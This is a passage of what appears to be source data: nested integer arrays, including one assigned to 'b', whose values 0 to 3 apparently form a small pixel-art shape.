[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0]]
b = [[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 1, 1, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
